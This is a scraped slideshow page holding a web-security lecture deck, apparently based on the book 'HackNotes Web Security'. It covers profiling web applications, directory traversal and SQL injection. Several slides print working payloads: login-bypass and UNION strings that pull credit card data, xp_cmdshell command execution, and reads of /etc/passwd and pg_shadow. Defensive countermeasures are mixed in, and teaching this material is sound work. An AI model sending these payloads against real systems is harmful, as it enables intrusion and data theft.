hacknotes web security n.
Skip this Video
Loading SlideShow in 5 Seconds..
HACKNOTES - Web Security PowerPoint Presentation
Download Presentation
HACKNOTES - Web Security

Loading in 2 Seconds...

play fullscreen
1 / 77

HACKNOTES - Web Security - PowerPoint PPT Presentation

Download Presentation
HACKNOTES - Web Security
An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. HACKNOTES - Web Security Mike Shema McGraw-Hill/Osborne INSA, Kai

  2. PART IHacking Techniques & Defenses • Web Hacking & Penetration Methodologies • Critical Hacks & Defenses INSA, Kai

  3. 1 Web Hacking & Penetration Methodologies • Threats and Vulnerabilities • Profiling the Platform • Profiling the Application • Summary INSA, Kai

  4. THREATS AND VULNERABILITIES • Vulnerabilities • The platform – Linux, Windows, Apache, Oracle • The application – programming errors • SQL injection • Session hijacking INSA, Kai

  5. PROFILING THE PLATFORM • Web Server – Apache, IIS, Netscape • Application Server –Tomcat Servlet, PHP, ASP.NET • Database – Oracle, MSSQL, DB2, Infomix, Sybase. INSA, Kai

  6. Port Scanning and Service Identification • Nmap INSA, Kai

  7. Port Scanning and Service Identification • Scanline – fast but only perform SYN, ICMP and UDP scans INSA, Kai

  8. Port Scanning and Service Identification • Netcat & openssl openssl s_client –connect website:443 –cipher EXPORT40 openssl s_client –connect website:443 –cipher NULL openssl s_client –connect website:443 –cipher HIGH INSA, Kai

  9. Vulnerability scanning • Nikto & Nessus INSA, Kai

  10. Platform profile checklist • Identify the server’s role • Determine the operating system and version • Determine the operating system and application patch level • Scan for open ports • Record the web server type, patch level, and additional components • Research known vulnerabilities. INSA, Kai

  11. PROFILING THE APPLICATION • The next step is to profile the actual web site by systematically cataloging all of its pages, functions, and parameter. • To identify common problems such as poor input validation, inadequate session handling, and other programming errors. INSA, Kai

  12. Enumerate the Directory Structure and Files • Indexex, The easy part is going through the application and recording each file name and its full path from the web root. • Teleport, wget • libwhisker’s crawl function INSA, Kai

  13. Identify Authentication Mechanism Keep in mind that challenge/response mechanisms don’t protect passwords with 100 percent security INSA, Kai

  14. Identify Authorization Mechanism • Identify Authorization Tokens • http://website/index.php?id=allen&isadmin=false&menu=basic • If the request succeeds, then the application is vulnerable to • horizontal privilege escalation. • http://website/index.php?id=george&isadmin=false&menu=basic • If the request doesn’t receive administrator right, then user impersonation still works, • but the server tracks authorization in a parameter other than id. • Otherwise, the application performs the authorization check based on the username, • is vulnerable to horizontal and privilege escalation. • http://website/index.php?id=matt&isadmin=true&menu=full • if the request succeeds, then the application is vulnerable to • vertical privilege escalation. The attack required manipulating multiple tokens, • but the application still failed to enforce strong authorization checks. • http://website/index.php?id=matt&isadmin=true&menu=basic • If the request succeeds, then application is vulnerable to vertical privilege escalation. • The application performs an authorization check on the isadmin parameter and • provides functionality according to the a value. • http://website/index.php?id=matt&isadmin=falso&menu=full • if the request succeeds, then the application is vulnerable to • vertical privilege escalation. The application doesn’t perform any authorization • checks after the user has authenticated. INSA, Kai

  15. Protect Authorization • The best defense is to track as many user attributes on the server as possible. • Creating role-based access in a custom database table increases application overhead and maintenance; however, the security requirements of the application may require such a technique. INSA, Kai

  16. Identify All “Support” Files • style sheets (.css) • IIS files that are interpreted by specific ISAPI (internet server application programming interface) filters, such as .htr, .htx, .idc , .ida and .idq. • passwd.txt & global.asa • Nikto will identify these common files, but only in default locations. INSA, Kai

  17. Identify All Include Files • To identify an include file by search for the Server Side Include (SSI) tag. • Virtual • File • PHP • Log <!-- #include virtual = “/html/include /header.inc” --> <!-- #include file = “include/header.inc” --> INSA, Kai

  18. Protect Include Files • Always use the language’s file suffix instead of .inc when naming include files. • If you’re using Apache::ASP, then you can either rename the files to .asp or modify the httpd.conf file • The <FilesMatch> trick <% This line will not be visible if the file suffix is .asp %> <!– This line will be visible regardless of the file suffix --> INSA, Kai

  19. Enumerate All Forms • The indicator of a form is the HTML <form> tag; how ever, the salient portions are the “input type” definitions: • Form-based authentication is also a primary target for brute-force password-guessing attacks. <INPUT TYPE=“hidden” NAME=“sess_id” VALUE=“ “> from APBoard <INPUT TYPE=“hidden” NAME=“postit” VALUE=“TRUE“> <INPUT TYPE=“hidden” NAME=“insertinto” VALUE=“1“> <INPUT TYPE=“hidden” NAME=“BoardID” VALUE=“1“> <INPUT CLASS=“button” TYPE=“sumit” NAME=“new_topic” VALUE=“Thema posten“> <INPUT CLASS=“button” TYPE=“sumit” NAME=“prefiew_topic” VALUE=“Vorschau“> INSA, Kai

  20. Enumerate All GET Parameters • Many applications track variables through URL parameters. The server sets these parameters based on user permission level, a user’s action, a session ID, or similar function. • This can point to the parameter’s function or its relation to session tracking, or it can generate informational errors. • Each GET parameter should also be tested for input validation and SQL injection attacks http://website/main.asp?menu=viewprofile viewprofile, user, welcome, admin, debug INSA, Kai

  21. method=POST Method = GET Protect Parameters • If the application uses GET parameters to track values then you might consider using POST request more often. • The parameters to a POST request will not show up in a browser’s history file or bookmarks. INSA, Kai

  22. Identify Vector forDirectory Attacks • Directory attacks: traversal and listing • Applications that use templating techniques • Typical attack • NULL (%00) character • Try this to bypass scripts that check for file extensions or automatically append characters to file names. • http://website/cgi-bin/bb-hostsvc.sh?HOSTSVC=www,website,com.cpu • http://website/servlet/webacc?User.html=index • http://website/ultraboard.pl?action=PrintableTopic&Post=42 • ../../../../etc/passwd • ../../conf/httpd.conf • ../../../../boot.ini • ../../../../winnt/repair/sam ../../etc/paswd%00html INSA, Kai

  23. Identify Areas that ProvideFile Upload Capability • File upload introduces several threats to the application • Malicious Content • File Overwrite • Denial of Service INSA, Kai

  24. Identify Errors • Two steps • Simply try to generate some errors in the application. • Identify what types of errors are generated on the server and how they are displayed to user. Inserting garbage characters deleting parameters inserting punctuation Did it return the server’s default HTTP 500 message? Is it a customized error page? Does an error return a custom page, but an HTTP 200 message? What information does the error contain? Can you identify path information? What about internal variables or references to other files? Is the error related to SQL queries? INSA, Kai

  25. Protect Error Messages • Errors can be caught in two locations • The web or application server • Change the content of these pages so that it does not include any server or application information. • The application itself • Make sure that the application has proper error-handling routines that default to a simple, innocuous error message. INSA, Kai

  26. Determine Which PagesRequire SSL • Replace all of the https:// references with http:// and see if the application still serves the page. • The server and application should be designed to ensure that sensitive files are transmitted via SSL. INSA, Kai

  27. Applicatoin Profile Checklist INSA, Kai

  28. SUMMARY • In order to full vet the security of an application, it must first be fully profiled. • This basically involves gathering as much information about the platform and the application. • A good profile of the application and knowledge of SQL can turn an innocuous error into a severe exploit. INSA, Kai

  29. 2 Critical Hacks & Defenses • Generic Input Validation • Character Encoding • Alternate Request Methods • SQL Injection • Cross-site Scripting • Token Analysis • Session Attacks • XML-Based Services • Fundamental Application Defenses • Input Validation • Summary INSA, Kai

  30. GENERIC INPUT VALIDATION • Common input validation tests INSA, Kai

  31. GENERIC INPUT VALIDATION • Common input validation tests (cont.) INSA, Kai

  32. Common Vectors Consider these vector as well Example input Validation attack vectors INSA, Kai

  33. Source Disclosure • Certain input validation attacks manipulate the CGI’s file name in order to cause its source to be displayed in a user’s browser. • Java-based server engines seem to be most vulnerable to this type of validation attack • /foo.jsP • /foo.js%70 • /%3f.jsp (directory listing) • /foo.asp::$DATA • /foo.asp+.html INSA, Kai

  34. CHARACTER ENCODING • URL Encoding (Escaped Characters) • Unicode Mask: 1 1 0 0 0 0 b7 b6 1 b6 b5 b4 b3 b2 b1 b0 ---- first byte ------ ---- second byte --- Example: 0 0 1 0 1 1 1 1 (2F) b7 b6 b5 b4 b3 b2 b1b0 ------ one byte --------- Result: 1 1 0 0 0 0 0 0(C0) 1 0 1 0 1 1 1 1(AF) In url: %c0%af INSA, Kai

  35. Some Useful Unicode-Encoded Characters INSA, Kai


  37. SQL INJECTION URL = HTTP.GetFromUser(); user_id = URL.parameter(“user_id); password = URL.parameter(“password”); query = “SELECT name FROM userlist WHERE uid=‘” + user_id + “’AND pwd=‘” + password + “’;” database.connect(); result = databasae.execute(query); if resule HTTP.Send(“Login successful. Welcome, “ + result) IsAuthenticated = true; else HTTP.Send(“User ID or password is incorrect.”) isAuthenticated = false; end if if IsAuthenticated HTTP.Send(MainMenu) end if https://website/login.cgi?user_id=dcooper&password=diane https://website/login.cgi?user_id=dcooper’;%20-- INSA, Kai

  38. SELECT Statement Manipulation • https://website/login.cgi?user_id=dcooper&password=‘%20OR%20”%3d’ • https://website/login.cgi?user_id=dcooper&password=foo%20OR%201%3d1 • https://website/login.cgi?user_id=‘%20OR%20’’%3d’&password=‘%20OR%20’’%3d’ • https://website/login.cgi?user_id=%25’;-- SELECt name FROM userlist WHERE uid=‘dcooper’ AND pwd=‘’ OR ‘’=‘’; SELECT name FROM userlist WHERE uid=dcooper AND pwd=foo OR 1=1; SELECT name FROM userlist WHERE uid=‘’ OR ‘’=‘’ AND pwd=‘’ OR ‘’=‘’; SELECT name FROM userlist WHERE uid=‘%’ ;--’ AND pwd=‘’; INSA, Kai

  39. Retrieve Arbitrary Data with SELECT plus UNION • SELECT value(s) FROM table WHERE clause_false UNION ALL SELECT value(s) FROM other_table WHERE clause_true https://website/login.cgi?user_id=foo&password=‘+UNION+ ALL+SELECT+uid,+pwd+FROM+userlist+WHERE+”%3d’ SELECT name FROM userlist WHERE uid=‘foo’ AND pwd=‘’ UNION ALL SELECT uid, pwd FROM userlist WHERE ‘’=‘’; https://website/login.cgi?user_id=foo&password=%27+UNION+ALL+ SELECT+first%5fname%2clast%fname%2cccard+FROM+store+ WHERE+%27%27%3d%27%27; SELECT name FROM userlist WHERE uid=‘foo’ AND pwd=‘’ UNION ALL SLEECT first_name,last_name,ccard FROM store WHERE ‘’=‘’; SELECT name FROM userlist WHERE uid=foo AND pwd=bar UNION ALL SELECT first name, last name, ccard FROM store WHERE 1=1; INSA, Kai

  40. Use INSERT to Modify Data • INSERT INTO user (User,Password) VALUES (‘albert’,’camus’); https://website/login.cgi?user_id=&password=%27;+INSERT+INTO+userlist+ %28uid%2cpassword%29+VALUES%28%27albert%27%2c%27camus%27%29;--+ SELECT name FROM userlist WHERE uid=‘’ AND pwd=‘’; INSERT INTO userlist (uid,password) VALUES (‘albert’,’camus’);-- ‘; INSA, Kai

  41. Salient Information for Common Databases INSA, Kai

  42. Common SQL Injection String INSA, Kai

  43. SQL Injection Countermeasures • Use strongly typed variables and database column definitions. • Assign query results to a strongly typed variable. • Limit data lengths. • Avoid creating queries via string concatenation. • Apply data separation and role-based access within the database. http://website/votw/analysis.asp?voteid=@@version Microsoft OLE DB Provider for SQL Server error ‘80040e57’ Arithmetic overflow error converting nvarchar to data type numeric. /vote/analysis.asp, line 19 “SELECT something FROM table WHERE” + varable… INSA, Kai

  44. Microsoft SQL Server • Insert a single quote (‘) into URL parameters and then examine the output, HTML source, or even the URL parameters for a tell-tale sign. • In addition to the slew of attacks that can be performed against any SQL-based database, MSSQL server contains a set of very powerful – and dangerous – commands. EXEC master.xp_cmdshell ‘command’ https://website/vuln.cgi?param=‘;xp_cmdshell+’ipconfig+/all’+;-- INSA, Kai

  45. High-Risk Stored Procedures in MSSQL INSA, Kai

  46. Useful Objects and Variables INSA, Kai

  47. Oracle Informational Oracle parameters show parameters control_files; CREATE DIRECTORY somedir AS ‘/path/to/dir’; CREATE TABLE foo (bar varchars2(20)) ORGANIZATION EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY somedir LOCATION (‘somefile.dat’)); DECLARE fh UTL_FILE.FILE_TYPE; BEGIN fh := UTL_FILE.fopen(‘/some/dir’,’file.name’,’W’); -- wite UTL_FILE.PUTF(fh, somedata); UTL_FILE.FCLOSE(fh); END INSA, Kai

  48. MySQL – Read from the File System mysql> CREATE TABLE foo (bar TEXT); Query OK, 0 rows affected (0.02 sec) mysql> LOAD DATA INFILE ‘/etc/passwd’ INTO TABLE foo; Query OK, 27 rows affected (0.02 sec) Records: 27 Deleted: 0 Skipped: 0 Warnings: 0 mysql> SELECT * FROM foo; bar --------------------------------------------------------------------- root:x:0:0:root:/root:/bin/bash mike:x:500:500:mike:/home/mike:/bin/bash mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash https://website/vuln.cgi?param=%27;+CREATE+TABLE+foo+%28bar+TEXT%29; https://website/vuln.cgi?param=%27;+LOAD+DATA+INFILE+%27%2fetc%2fpasswd%27+INTO+TABLE+foo; https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+foo; INSA, Kai

  49. MySQL – Write to the File System Create a DoS By taking up disk space SELECT * FROM employees INTO OUTFILE ‘/tmp/foo’; https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+ employees+INTO+OUTFILE+%27%2ftmp/%2f..%08%27; [melnibone]$ ls –la /tmp drwxrwxrwx 8 root root 4096 jan 16 16:28 . drwxrwxrwx 19 root adm 4096 jan 16 14:03 .. drwxrwxrwx 1 mysql mysql 1269 jan 16 16:28 .. [melnibone]$ ls –la /tmp | cat -tve drwxrwxrwx 8 root root 4096 jan 16 16:28 ./$ drwxrwxrwx 19 root adm 4096 jan 16 14:03 ../$ drwxrwxrwx 1 mysql mysql 1269 jan 16 16:28 ..^H$ INSA, Kai

  50. PostgreSQL – File Read/Write Access with COPY test=# CREATE TABLE foo (bar TEXT); CREATE test=# COPY foo FROM ‘/etc/passwd’; COPY test=# SELECT * FROM foo; bar --------------------------------------------------------------------- root:x:0:0:root:/root:/bin/bash mike:x:500:500:mike:/home/mike:/bin/bash mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash (27 rows) test=# COPY foo FROM ‘/var/lib/pgsql/data/pg_hba.conf’; COPY foo TO ‘/var/lib/pgsql/data/pg_hba.conf’; COPY foo TO ‘/tmp/table_data’; COPY pg_shadow TO ‘/tmp/foo’; INSA, Kai